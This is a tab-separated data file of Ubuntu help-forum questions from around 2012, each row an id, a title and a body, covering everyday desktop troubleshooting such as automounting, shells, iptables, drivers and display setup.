119236	partitions and cdrom are not automounted	provide my spec and sorry for my poor english first . mb : gigabyte g31m-s2l ( bios ver . f9 ) cpu : intel e5200 2g ram hd1 : wd 160g with 2 partitions ( partition 1:60g , ntfs , win xp ; partition 2:100g , ntfs ) hd2 : wd 320g with 2 partitions ( partition 3:220g , ntfs ; partition 4:100g , ext4 , ubuntu ) recently , i tried to install ubuntu 12.04 beta 2 on my desktop pc ( on partition 4 ) . at the beginning , everything looked great including the auto-mounting of partitions 1~3 and the unity ( 3d ) . however , after i deleted and re-allocated the partitions on hd2 and re-installed ubuntu on partition 4 , the partitions 1~3 are no longer auto-mounted when i logged in the desktop ( and even the inserted cdrom would not be mounted either ) . the configurations during these two installations are all the same as default . are there any possible reasons or solutions for this issue ?
119242	laptop goes off ( not shutdown ) , which log file should i check ?	i have problem with my lenovo x121e - goes off and i ca n't start it immediately again . i must wait 3-5 min and then works again . cpu temperature was okay , about 65째 , hdd temp too - 37째 . badblocks ( only read mode ) say , there are no bad sectors . any ideas , what can cause the problem ? where can i find more info about the cause ? edit : the power cuts without shutdown or restart process
119244	ca n't change global default video player to vlc ?	i have already set vlc for default video player but still vids , movies , etc . open in banshee and i can not find anyway to turn that off . so far i have to manually tell each vid to open with vlc and to 'ignore ' banshee . does anyone know any workarounds or hacks ? ? i think a plugin would be best ; ) may the force be with you ! !
119249	i 'm looking for a skype phone that works with ubuntu 11.10 any suggestions ?	just looking for something basic on which i can receive and make calls as if it were a normal house phone . my international calls are killing me on my mobile .
119253	i 've changed default shell but my terminal do n't get it	recently i 've changed my default shell from bash to zsh like this : chsh -s /bin/zsh myname but when i invoke a new terminal ( e.g . using ctrl+alt+t ) i still have bash loaded : myname @ machine : ~ $ cat /etc/passwd | grep myname myname : x:1000:1000 : myname , , , :/home/myname : /bin/zsh myname @ machine : ~ $ echo $ shell /bin/bash zsh is installed and can be explicitly runned with zsh command . how to deal with that ?
119258	prompt not working when logged in as specific user	hello i am running ubuntu 11.10 and access it via ssh with putty . my problem is that when i log in i get the prompt username @ server.com : ~ $ and my arrow keys do what the y are supposed to . when i try to login in as another user account i made all i get is this as the prompt it never says the directory or anyting $ also when ever i try to use the left , right , up or down arrow i get a character like this ^ [ [ a is this a bug in putty or did i just not set the account up right ?
119264	how to ( un ) dock ibm thinkpad x41 from x4 dock ( ing station ) successfully ?	i 'd like to start using my docking station again ; however , it still does n't work as it should , see the following bug descriptions ( with special focus on thinkpad x41 & the x4 dock ) . given that it still does n't work ( effective april 2012 ) , my hope is fading that it will start working all of a sudden with precise pangolin at the end of the month . this issue is very important to me and i would be most grateful to anyone being able to sieve through the following links ( some of which are actually quite recent ) and translate their meaning into reliable and concrete simple ( ? ) steps . i 've read briefly about hal and udev , and can imagine that they are somewhat related to this , see links below . i do n't want to fire at random . i do n't want to tinker around with bash scripts if avoidable ... problem description ( more or less ; - ) pressing the undock button on a `` thinkpad x4 dock '' with a thinkpad x40 does not cause any udev events . and the lights on the dock never change to indicate it is safe to undock . and ibm thinkpad x41 & docking station > > no joy : - ( ... when pressing the blue undock button on the docking station : - the screen goes blank ( with backlight remaining on ) , - with some ssd/hdd activity ; - ctrl alt del causes a shut down after ... seconds , indicating that the system itself has n't `` crashed '' but is still ( somewhat ? ) responsive . and with recent distributions , docking and undocking should function out of the box . you can monitor this by running # udevadm monitor and when you dock or press the undock button you should see a flurry of events . there are some issues though : no event on undock . - in some cases you may not get any events on undock . this is due to the acpi dock drivers only registering the first logical dock port they encounter and in some rare cases there may be more then one , such as on a thinkpad x40 with thinkpad x4 dock . patches are available , and are merged in 2.6.34 . now , if patches are available and merged into 2.6.34 - why is n't ( un ) docking simply working / fully supported in the latest version of natty ( which to my humble understanding has surpassed kernel version 2.6.34 a while ago ) ? more relevant links : thinkpad x41 docking station issues and [ howto ] run scripts for laptop lid open/close and dock/undock events and finally symptoms corrected by the latest bios update - thinkpad x41 - ( fix ) usb devices connected to ultrabase x4 or thinkpad x4 dock may not be recognized in boot menu by pressing f12 during post . thanks ! !
119265	can i use virtualbox as a sandbox for 12.04 ?	i am quite a cautious person though not afraid to experiment . i currently have 11.10 unity and 12.04 beta 2 running on different partitions ( no problems ) . i have learned here that unity can run in virtuabox . when i upgrade to 12.04 lts later this month , i am curious to understand if i could also run 12.04 in virtual box for experimentation and test some things before i implement them into my system ? maybe there is a better way to achieve this , without partitioning my hard drive .
119271	torrent clients suddenly stopped downloading	a few days ago i noticed , that transmission in my ubuntu 10.04 machine suddenly could n't download anything anymore . to overcome this i have uninstalled and reinstalled transmission and tried downloading with other clients ( deluge , vuze ) well seeded torrents ( ubuntu iso images for example ) without success . on the same computer i have also installed ubuntu 10.10 and windows 7 , which i rarely use . what makes the problem i encounter weirder , is the fact that downloading via torrents works fine in my ubuntu 10.10 and windows partitions but not in lucid lynx . browsing the web for similar problems did n't give me answers . any help would greatly appreciated .
119274	does ubuntu generally post timely security updates ?	concrete issue : the oneiric nginx package is at version 1.0.5-1 , released in july 2011 according to the changelog . the recent memory-disclosure vulnerability ( advisory page , cve-2012-1180 , dsa-2434-1 ) is n't fixed in 1.0.5-1 . if i 'm not misreading the ubuntu cve page , all ubuntu versions seem to ship a vulnerable nginx . is this true ? if so : i thought there was a security team at canonical that 's actively working on issues like this , so i expected to get a security update within a short timeframe ( hours or days ) through apt-get update . is this expectation -- that keeping my packages up-to-date is enough to stop my server from having known vulnerabilities -- generally wrong ? if so : what should i do to keep it secure ? reading the ubuntu security notices would n't have helped in this case , as the nginx vulnerability was never posted there .
119275	ubuntu 11.10 stuck on the purple load screened with the 5 progress bullets	my ubuntu looks as being stuck at the purple screen with ubuntu logo . how can i find what is the cause ? when i press ctrl+alt+del it will revive it and reboot , switching for a very short time to a console log before doing it .
119281	what is the function of the `` sticky edges '' on/off setting in displays ?	i have installed ubuntu 12.04 ( precise pangolin ) . if i open system settings > > displays there is a new ( ? ) on/off button for a setting named sticky edges . can someone tell me what this setting is supposed to control ?
119286	libreoffice : open in current program by default ?	i often need to open pipe delimited .txt files in libreoffice calc . however , once i have calc running , if i do file > open and select a spreadsheet with the extension .txt , it opens it in writer instead . is there a way to tell the file i 'm trying to open using whatever program instead of trying to pick which one to use ? barring that , is there a way i tell it to always use calc for .txt files ( when i open them from the open dialog in calc ) ? i still want them to open in gedit like they currently do if i double click them from thunar .
119291	ubuntu installation hangs on 1.5yr old pc ?	i downloaded ubuntu yesterday , burned it to a cd and tried to install it on my pc using a clean drive ( new ) , but ubuntus label and progress bar just stays on the screen , nothing loads up i 've let it run for 2 hours , but no progress . the drive is only a 120gb one , pre-formated with ext3 set as primary . any ideas ?
119294	flash player plugin on firefox will not update on ubuntu 11.10 32 bit	i am running on ubuntu 11.10 32 bit , and my flash player plug-in for firefox is outdated . i must update my plug-in to flash player 11 , but i am not able . i have already installed adobe flash player via ubuntu software center ( as it prompted me to after trying to download from the adobe site ) without the plug-in updated , videos can not be played from directly on a facebook page , and i believe that it distorts the video player on youtube . ( image of player can be seen at imgur.com/gybfx )
119298	apt-get using apt-cacher ng fails to fetch packages with hash sum mismatch	i have a machine who is using apt-cacher ng running on another machine as caching proxy . when i try to run sudo apt-get update i get the following errors : w : failed to fetch gzip : /var/lib/apt/lists/partial/it.archive.ubuntu.com_ubuntu_dists_oneiric-updates_main_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/it.archive.ubuntu.com_ubuntu_dists_oneiric-updates_main_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/it.archive.ubuntu.com_ubuntu_dists_oneiric-updates_universe_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/it.archive.ubuntu.com_ubuntu_dists_oneiric-updates_main_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . the directory /etc/apt/sources.list.d is empty . to fix that i have already tried the following with no success : solution 1 : sudo rm -fr /var/lib/apt/lists sudo mkdir -p /var/lib/apt/lists/partial sudo apt-get clean sudo apt-get autoclean solution 2 : sudo apt-get update -o acquire : :http : :no-cache=true any suggestion ?
119302	ufw settings - application integration	i have installed the ubuntu system , and deny both incoming and outgoing ports loosing internet access . now i want access only for my firefox that i have installed separately from the firefox website not the one from the repositories . now using application integration of ufw , i created a profile shown below : [ firefox ] title=firefox description=firefox web browser ports=80,443/tcp and added 53 port to allowed list for dns and then allowed firefox app profile outgoing connection . my final settings are shown below : status : active logging : on ( full ) default : deny ( incoming ) , deny ( outgoing ) new profiles : skip status : active logging : on ( low ) default : deny ( incoming ) , deny ( outgoing ) new profiles : skip to action from -- -- -- -- -- -- 53 allow out anywhere 80,443/tcp ( firefox ) allow out anywhere 53 allow out anywhere ( v6 ) 80,443/tcp ( firefox ( v6 ) ) allow out anywhere ( v6 ) now , firefox is able to access the internet , but all other applications are also able to access those open ports . i want only firefox to be able to access the internet..
119305	ca n't download music files purchased with ubuntu one from rhythmbox	i used the link to ubuntu one in rhythmbox music player to purchase music . on the my downloads page from ubuntu one in the rhythmbox it shows each of the files i purchased with and mp3 button and an aac button . i should be able to download the files from these buttons but when i click on the button nothing happens - i was expecting a download manager to open up . i also was expecting the files to be transferred to my ubuntuone account but do n't see anything there either . ( this is probably a second question ) i am using 12.04 beta version of ubuntu and the version of rhythmbox that came with it : 2.96 . do i need to install something to be able to download these links ? thanks .
119306	how do i get skype wrapper working ?	i am trying to get to work skype-wrapper on ubuntu i tried to follow these steps http : //www.omgubuntu.co.uk/2011/10/how-to-add-skype-to-the-ubuntu-messaging-menu/ also i tried to download and install it manually but it does n't work , nothing just happens when i run skype-wrapper can anybody advice me how to solve it ?
119307	can i run ubuntu from usb and save all information ?	hello i want to install ubuntu to my usb and run it simle on each computer . i want to save all that i do . for example when i install localhost using my home computer , i go to work and run ubuntu from usb and access loclhost without any change , i want to work like this . how can i do that ?
119308	how to change icons of specific file types on ubuntu 11.10 ?	i want to change file icons of some specific file types like- .html , .css etc . i have tried using `` file type editor ( assogiate ) '' which is not working . i have also tried using `` gnome tweak tool '' using icon themes . but that also does not worked properly ( though i can change folder icons , dash menu icons but not file icons ) . please suggest me a way so that i can change file icons properly . i have read some of the articles saying about some mime type changes . i could not get proper guide from any of those articles . if there is such a way then please write in detail . many many thanks in advance : )
119311	why ca n't i mount this partition ?	i have two hard disks ( 80 giga ide and 500 giga sata ) and i installed ubuntu 11.10 in hard disk 80 giga and give for him 20 gigabyte after that he saw all partition in two hard drivers until one i see it 's health in gparted magic and he can see it but ca n't check it and this photo the problem is on partition sdb5 and i use this command to mount it from terminal and took me this although that this partition working very well in windows and ubuntu could mount it before please give me any solution unless format or anything well delete my data because it 's very important before when i checked /dev/sdb5 , it had errors - now all program did n't appear any errors unless fdisk -l all of my hard disks can be mounted except partition d or /dev/sdb5 . what can i do ? i have tried to mount the partition with many different programs like gparted , kde partition manager , ntfs-3g from the terminal , and the mount command . all of them said something to the effect of : fuse : mount failed : device or resource busy ... or ... one or more block devices are holding /dev/sdb5 i installed ubuntu 11.10 again today to see if anything had changed . the partition works fine under windows .
119317	is there a tracking site for which community packages might need attention ?	the question i 'm referring to is this one . while disabling everything but main and restricted is do-able to get for sure up to date packages ... i think more people might jump in if there was a bug-need-squashing tracker that was more generally - package needs update for cve-x . this would be sort of like the freebsd portaudit so the meat of the question : does something like this exist ?
119318	how do i customize alt+tab behaviour ?	goal : i would like to make the little menu that pops up when i press alt+tab to gain the ability to jump to a particular window by pointing my mouse at one of the icons . this is the behaviour that my mac osx laptop has . the situation i use xfce , with the default windows manager ( xfwm ) . i currently have ubuntu 10.04 and 11.10 , although i plan on updating both to xubuntu 12.04 once the dust settles ( probably mid-may ? ) . ( clarification , for my current setup , i installed ubuntu , then added xfce manually after the fact ) . so , a series of related questions . how do i set this up ? ( if this is not possible , please answer the following questions to help me learn ) is the alt+tab a function of the desktop environment , or the windows manager , or some other piece ? ( ie if i switch to using some other tool , could i potentially get this ) are there any customizations that are available either from settings or add-on applications that would allow me to change the behaviour of that menu ?
119319	how can i configure the buttons of my wacom tablet ?	i have a wacom bamboo tablet ( mte-450a ) . it works out of the box on 11.10 , even the scrolling function works ( it used not to ) . unfortunately the four buttons are assigned to things i do n't know . how can i reconfigure them to buttons i want , for example ctrl+z ?
119324	why is rvalue write in shared memory array serialised ?	i 'm using cuda 4.0 on a gpu with computing capability 2.1 . one of my device functions is the following : device void test ( int n , int* itemp ) // itemp is shared memory pointer { const int tid = threadidx.x ; const int bdim = blockdim.x ; int i , j , k ; bool flag = 0 ; itemp [ tid ] = 0 ; for ( i=tid ; i < n ; i+=bdim ) { // { code that produces some values of `` flag '' } } itemp [ tid ] = flag ; } each thread is checking some conditions and producing a 0/1 flag . then each thread is writing flag at the tid-th location of a shared int array . the write statement `` itemp [ tid ] = flag ; '' gets serialized -- though `` itemp [ tid ] = 0 ; '' is not . this is causing huge performance lag which technically should not be there -- i want to avoid it . please help .
119325	how can i embed subtitles into a movie file ?	my tv can only play subtitles if they are embedded into the file ( eg a mkv or hardcoded over the video ) . so given a film in a format ( eg mp4 ) and a subtitle as something like a srt , how can i combine them into something my tv can play ?
119332	touchpad problem in gnome shell	for some time the touchpad jerky and i can not understand why . if i log with unity or create another account ( and i log it with `` gnome shell '' ) behaves perfectly . you know give me some advice on how to solve the problem ?
119334	accessing server on internet	how do i access my server on the internet ? i would want it to have a domain of piezosystems.com , accessed on internet but not public . my router has a ip adress of 10.0.0.1 , comcast , and my server 10.0.05 , can not route it to internet . please help .
119347	just installed ubuntu - mostly empty screen that does n't respond to mouse clicks or keyboard	i installed ( twice ) ubuntu x64 11.10 and it does boot ( most of the time , sometimes it gets stuck with this problem my fresh installation does n't load . ( pulseaudio problem ) ) the little startup sound plays , i see a background , and a toolbar left and a thinner grey one top . there 's three buttons on the left one , nothing on the top . i can move the mouse cursor but no key press or mouse ( left or right click ) anywhere does anything . i do n't know what 's going wrong with it or what to search for to find a solution . i 'm hoping someone has an idea from this description . the hardware is relatively modern so quite possibly it needs some drivers or configuration changes : intel dx79t0 motherboard i7 6-core ati radeon 6950 what steps should i try to resolve this ?
119353	ubuntu not working with at & t uverse 2wire 3600hgv router	so i am using at & t uverse via the provided 2wire 3600hgv router . i was able to connect to the wireless connection when i was using the live cd and installing ubuntu , but after the install and restart i could no longer connect . every few minutes i am asked for the network key , but it never finishes connecting
119356	how do i open links in one browser automatically in another ?	i 'd like links i click on in midori to automatically open in another web browser , firefox . how do i do this ?
119357	how to install the full gnome desktop as close to upstream as possible ?	just like the title says . i do n't want just gnome shell i want to know how to install the whole entire desktop , with the latest gdm ( not the 3.0.4 currently in the repos ) , all the default apps , all of it . i want to have a gnome desktop as pure as the latest fedora , but of course i do n't actually want to use fedora i been a ubuntu user for years . any ideas ? or am i crazy ? i cant find anyone else doing this , though i have found a few other people who want to do it . i currently have gnome shell 3.4 , but i cant figure out how to install the new login screen , and i do n't know what apps install by default other than epiphany and empathy , i also do n't know if there is still more missing than just those things listed . i would really enjoy the full gnome 3 experience .
119359	for motu packaging , to try or to install ubuntu ?	when using testdrive for precise release , do you `` install ubuntu '' or `` try ubuntu '' ?
119361	problem with ubuntu first run	today i installed the ubuntu system and everything went well . when the computer restarted and i chose linux , it showed me just a purple screen and nothing else ; just a blank purple screen . now , i do n't know what to do with it , how to un-install it or how to make it work .
119362	ca n't install ubuntu 11.10 on a seperate disk partition . i have a log file . please help !	before i installed ubuntu , i resized my c : drive ( which has my windows 7 os ) . prior to resizing , i even defragged the said drive . i tried using wubi to install it on the created partition , but i receive an error . i have the log file and i would post it but it 's too long and the site wo n't let me . : ( so anyway , i was n't able to install it , so i uninstalled it . upon uninstalling wubi and ubuntu , i tried installing it by having the cd to my cd rom . the installation was a success , however , upon rebooting i can neither boot to ubuntu or windows 7 . i get stuck in an infinite bootloop . i hope you can help me out ! : (
119364	unable to enumerate usb device on port 2 when connecting android phone	i 'm running ubuntu 11.10 ( 64-bit ) as a virtualbox guest on a win7 64-bit host . when i plug in my android epic4g ( galaxy s ) both the host and guest see the device properly , however lsusb does not . when i run dmesg i get the following : [ 361.664219 ] usb 1-2 : new full speed usb device number 79 using ohci_hcd [ 362.428798 ] hub 1-0:1.0 : unable to enumerate usb device on port 2 [ 363.313782 ] hub 1-0:1.0 : unable to enumerate usb device on port 2 i get the same type of dmesg message with the usb 2.0 ( echi ) controller enabled and disabled for the guest os . i 'm stuck with this one , can anyone help ?
119369	blue people on flash videos ( youtube , vimeo , etc ... )	after a recent update i am seeing everyone in any video blue . only the people are blue . first i was thinking it was an april fools joke about the song blue from eiffel 65 but it has been 4 days already . i tested on another 2 pcs , same problem . it started about a week ago i think . i am using flash 11.2.202.228 with firefox 11 . the problem is not there if i use google chrome . in chrome the flash player is 11.2.31.118
119370	how can i format my active hard drive to ntfs ?	i 'm trying to install windows 7 with a 4gb flash drive , but my error that comes up is that my hard drive i 'm trying to install on is in ext4 . i need to format it to read ntfs . i ca n't seem to find any topics on how to format an active hard drive . i found a topic that explains how to move ubuntu to a new drive , but it 's a bit confusing to me .
119373	no items show in dash of gnome-shell when using `` axiom '' theme ?	i am using the awesome axiom gnome-shell theme from deviantart . the theme works perfectly except for one issue , no items show up in the dash ? the actual items are there , e.g . if i type in something i know exists and then press enter it opens the program , there are simply no icons visible . why is this ? yet after some more playing i have discovered some other funkyness , for example , if a lot of items are returned by the search you get :
119374	flash plugin not working	i am using 11.10 on an old intel mac . i have trouble viewing flash videos , and even after installing the plugin i can not see them on either browser ( ff/chrome ) . on chrome , it seems the shockwave flash does not exist in `` about : plugins '' . so how can i get it in my system ?
119379	shortcuts/links to windows partition disappear on reboot	ubuntu 11.10 recognizes my windows 7 partition ok . since that is where my work has historically been , i created links to various files and folders there . everythingĺ fine until i reboot . then the icon reverts to the generic and i am informed the link is no longer valid . i created the links by right-clicking the folder or file and selecting `` make link '' in the windows folder , then dragging it to the ubuntu desktop . how can i fix this ? btw , it worked ok with kubuntu ; i got seduced by the sexy unity desktop ... ..
119382	how do i get dual monitors to work properly in ubuntu 11.10 on a dell latitude d630 ?	i have spent a lot of time trying to get dual monitors to work on ubuntu 11.10 on my dell latitude d630 ( nvidia nvs 135m video card ) . for starters , the system displays settings app always only showed one unknown monitor , even though i had the external acer monitor connected . so i downloaded and installed the nvidia drivers . according to what i read i would need to only use the nvidia driver app ( nvidia x server settings ) , so that 's what i 've done . ( system displays settings continued to only show a single monitor anyway ) . nvidia settings app only showed on monitor until i changed the bios setting to use the onboard video for external monitor ( not the dock video , which it was set to , even though i do n't have a docking station ) . the nvidia setting app now recognized both monitors . so , i setup the x server display config as separate x screen for both monitors . my laptop screen shows up as auo 1440x900 and my external monitor as acer e211h 1920x1080 . everything seemed like it would work , but the external monitor was just a complete white screen . the external monitor was non-functional , even though sometimes it would show the background image - still nothing would show up over there . so , i checked the enable xinerama box . now , after logging out and back in , the wallpaper extends to both screens but i get no taskbar at the bottom or top , no system menus , and i have to press the power button to restart or log off . after experimenting with all the shells , the only one that shows the menus and taskbars when i log in is gnome classic . this is pretty much the same symptoms as found here : how do i fix 11.10 gui ? . so , i resign myself to the older shell . everything works fine until ... i unplug the external monitor ... this is a laptop after all . anyway , after doing some work on the road , i plug back in and i still see both screens and it 's functional except , ... now , the laptop screen ( with the taskbar and menu bar ) has 4 black bars at the top that windows can not cover . the top bar is the menu bar ( with applications , places , the date and time and the system menu on the right ) . but the next 3 bars ( the same height as the top menu bar ) are empty and are just reducing the max size of windows on that screen . see screenshot here : my questions how do i get rid of those extra 3 black bars ? they 're taking valuable screen space . ( less critical ) how do i successfully use both screens in the ubuntu or ubuntu 2d shell ?
119384	ca n't install deepin software center.deb	i have been putting in the command sudo dpkg -i package_file.deb and it just says that there is no file .
119392	repeat one song plugin not working for rhythm box	is this plugin repeat one song - https : //launchpad.net/repeat-one-song working for anyone ? ( for new versions 2.9+ ) ?
119393	how to save rules of the iptables ?	i create the rules to iptables . but , when i restart the computer , the rules do n't work ! how to save the rules on ubuntu ? the was problem solved ! do : after of the write the commands iptables , do : 1. sudo su 2. iptables-save > /etc/iptables.rules 3 . in /etc/network/if-pre-up.d/iptables , put : # ! /bin/sh iptables-restore < /etc/iptables.rules exit 0 4 . after , in /etc/network/if-post-down.d/iptables , put : # ! /bin/sh iptables-save -c > /etc/iptables.rules if [ -f /etc/iptables.rules ] ; then iptables-restore < /etc/iptables.rules fi exit 0 5 . after , give permission to the scripts : sudo chmod +x /etc/network/if-post-down.d/iptables sudo chmod +x /etc/network/if-pre-up.d/iptables more information : https : //help.ubuntu.com/community/iptableshowto # saving_iptables good luck !
119403	intex tv tuner card saa713x tv internal tuner card without fm installation	please help me to solve this problem . i have tried with the some of the answers with tvtime but i was not able to configure . i am feeling sick to go to windows when i started using linux ubuntu . the only thing that is forcing me to boot to windows is this tvtuner card . i have tried to run with wine but not working . please help me regarding this internal tv tuner driver installation ( intex tv tuner card with out fm saa7130 ) . ysrinivas @ ysrinivas-ga-880gm-usb3 : ~ $ lspci 00:00.0 host bridge : advanced micro devices [ amd ] rs880 host bridge 00:01.0 pci bridge : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( int gfx ) 00:05.0 pci bridge : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( pcie port 1 ) 00:0a.0 pci bridge : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( pcie port 5 ) 00:11.0 sata controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 sata controller [ ide mode ] 00:12.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.1 usb controller : advanced micro devices [ amd ] nee ati sb7x0 usb ohci1 controller 00:12.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.1 usb controller : advanced micro devices [ amd ] nee ati sb7x0 usb ohci1 controller 00:13.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices [ amd ] nee ati sbx00 smbus controller ( rev 3c ) 00:14.1 ide interface : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 ide controller 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge 00:14.5 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:18.0 host bridge : advanced micro devices [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices [ amd ] family 10h processor link control 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs880 [ radeon hd 4250 ] 01:05.1 audio device : advanced micro devices [ amd ] nee ati rs880 hdmi audio [ radeon hd 4200 series ] 02:00.0 usb controller : etron technology , inc. ej168 usb 3.0 host controller ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) 04:06.0 multimedia controller : philips semiconductors saa7130 video broadcast decoder ( rev 01 ) 04:0e.0 firewire ( ieee 1394 ) : texas instruments tsb43ab23 ieee-1394a-2000 controller ( phy/link )
119404	wireless driver needs to be recompiled after each kernel upgrade	i have a d-link dwa-125 wifi usb key , which i managed to get running via this tutorial : http : //kaustav.codebinders.com/2011/10/install-dwa-125-wireless-driver-on-ubuntu-11-10.html the only problem i have is that every time i upgrade the kernel i need to rebuild and re-enable the module . is there any way around this ? i am currently running 12.04 ( i did have the same issue with the 11.10 release ) .
119407	all browsers crashing after upgrade	after system update yesterday , all browsers on ubuntu 11.10 seem to be crashing . the system is almost unusable because browsers have been essential these days . there is no way to use any browser for more than 2 minutes . i tried the steps mentioned in a related issue like reinstalling nvidia-drivers and libvdpau1 but those did not help . i am um unable to see any open bugs too .
119415	how to install linux bootloader to root	i want to install ubuntu 11.10 but its bootloader should be installed to linux root and not to mbr because i want windows 7 , mac osx lion and ubuntu 11.10 with chameleon bootloader as default loader .
119417	english as a system language but russian regional settings	i usually choose english as an installation language since i believe that the original is better than the translation . however , the environment i 'm working in is mostly russian , so i have to deal with locale specificity . even worse is the fact that selecting english yields to royal measurement system , that is , feet , inches , and damned letter paper size . whatever i do , i did n't manage to get rid of letter paper size - eventually here and there i stumble upon letter as a hidden default , and that spoils my prints . how can i select and use english as my language , but use metric system everywhere and a4 paper size everywhere , and russian regional settings ( date , time , decimal etc ) .
119423	how to downgrade kernel image ?	recently i updated my linux kernel from 3.0.0-17 to 3.0.0-18 . and now chromium keeps giving me a segmentation fault and so does ubuntu-bug and even nautilus . now i want to downgrade back to 3.0.0-17 until the bug is fixed . so how do i do that ? i run ubuntu11.10 32-bit .
119429	no sound , even though devices appear ok	i have a weird problem . sound used to work until a couple of days ago , but now the builtin speakers in my thinkpad w520 have stopped working . this happened after either : an update using the headphone jack in my laptop dock ( i had used the jack in the actual laptop before without issues ) as i was saying , the speakers do not work at all . sometimes i get a clicking sound from the laptop , which i assume is the system beep . this does not happen consistently . if i plug headphones in the laptop , i do get sound in them . i have tried playing with all the possible settings both in gnome and using alsamixer . some screens : what could i try next ?
119431	how to specify where windows will open when using two monitors	i 'm connecting my tv to my dell vostro v131 ubuntu 11.10 via hdmi . i 'm trying to figure out how to determine on which display new windows will open . i 've searched for an answer for a week now and i found nothing helpful . thanks .
119435	how to tell gnome which file to use to change backlight brightness ?	i have a dell inspiron m5010 and i am unable to change my backlight brightness with the f-keys and it also does not work with gnome brightness widget . i am able to change backlight brightness manually on the terminal with $ sudo -s $ cd /sys/devices/virtual/backlight/dell_backlight $ ls -la insgesamt 0 drwxr-xr-x 3 root root 0 2012-04-06 13:03 . drwxr-xr-x 3 root root 0 2012-04-06 13:03 .. -r -- r -- r -- 1 root root 4096 2012-04-06 13:17 actual_brightness -rw-r -- r -- 1 root root 4096 2012-04-06 13:17 bl_power -rw-r -- r -- 1 root root 4096 2012-04-06 13:03 brightness -r -- r -- r -- 1 root root 4096 2012-04-06 13:03 max_brightness drwxr-xr-x 2 root root 0 2012-04-06 13:17 power lrwxrwxrwx 1 root root 0 2012-04-06 13:03 subsystem - > ../../../../class/backlight -rw-r -- r -- 1 root root 4096 2012-04-06 13:03 uevent $ echo 8 > brightness can i configure gnome power manager to use the right files somehow ?
119440	can i install ubuntu one client for windows using a restricted account ?	i do not use windows personally but my university department 's labs have many windows 7 machines . i 'd like to use ubuntu one client there but uac ( user account control ) stops me . i only have write access to my home directory and c : \temp . is it sufficient to run ubuntu one client ?
119443	how do i report a bug that happens during boot ?	i seem to have found a bug in 12.04 while it 's booting , but all the questions on this site seem to point users to reporting bugs once the desktop is up and running by using ubuntu-bug . how do i report a bug where i ca n't use ubuntu-bug and where i do n't know the package name ?
119448	trouble installing ubuntu from usb	i have a pc with windows 7 on one disk . first , i use wubi to install ubuntu , but i can not see the ubuntu logo . then , i try to install 11.10 on the disk , but i get the same result . and then i try to install 12.04 with usb , but i get the same result again . when i restart the computer and choose to boot from usb , i can see a screen with a gray menu containing some options such as run ubuntu on the usb , install ubuntu on disk , and others . when i choose `` install ubuntu on disk '' , the computer outputs some lines of text , and the screen becomes a mess . after a little while , the screen 's power light goes dark . updates : machine information : cpu : amd athlon ii*3 440 motherboard : ga-ma77ot-ud3p videocard : ati radeon hd 5600/5700
119449	ca n't use nvidia card/driver on optimus notebook	i installed ( once again ) the latest official nvidia driver for my gt540m on ubuntu 11.10 . even though everything seems ok with my xorg.conf file ( i 've manually added busid `` pci:1:0:0 '' , since lspci shows 01:00.0 for my gpu ) . the problem is , when i use the xorg.conf file generated by xorg -configure , xorg automatically loads the intel gpu . so i removed everything that was not related to my nvidia card , basically leaving my xorg.conf with one screen and one device ( with the nvidia driver and the above-mentioned busid ) , and xorg fails to start . the log says something like `` devices on gt540m [ newline ] none '' and a few lines later , something like `` nvidia ( 0 ) found a screen , but have no device for it '' . when i do n't set the busid , it does n't seem to detect my card either . thank you for any suggestion . ps : if possible , i 'd like to avoid bumblebee or any similar `` hybrid graphics '' solution , last time i tried i ended up reinstalling ubuntu . edit : allow me to clarify the problem . i have a notebook with a gt540m graphics card , and an integrated intel gpu . i want to use the graphics card with full hardware acceleration and its official driver , as i do under windows .
119459	multiple entries in /etc/cifspw	i 'm trying to mount windows shares from ubuntu . every tutorial tells me to store crendentials for the shares into the /etc/cifspw file . this is very good and works very well for a single windows share . i 'm trying to add another share from another machine with different credentials . how is this posible ? is there some kind of secret format for cifspw allowing multiple entries ?
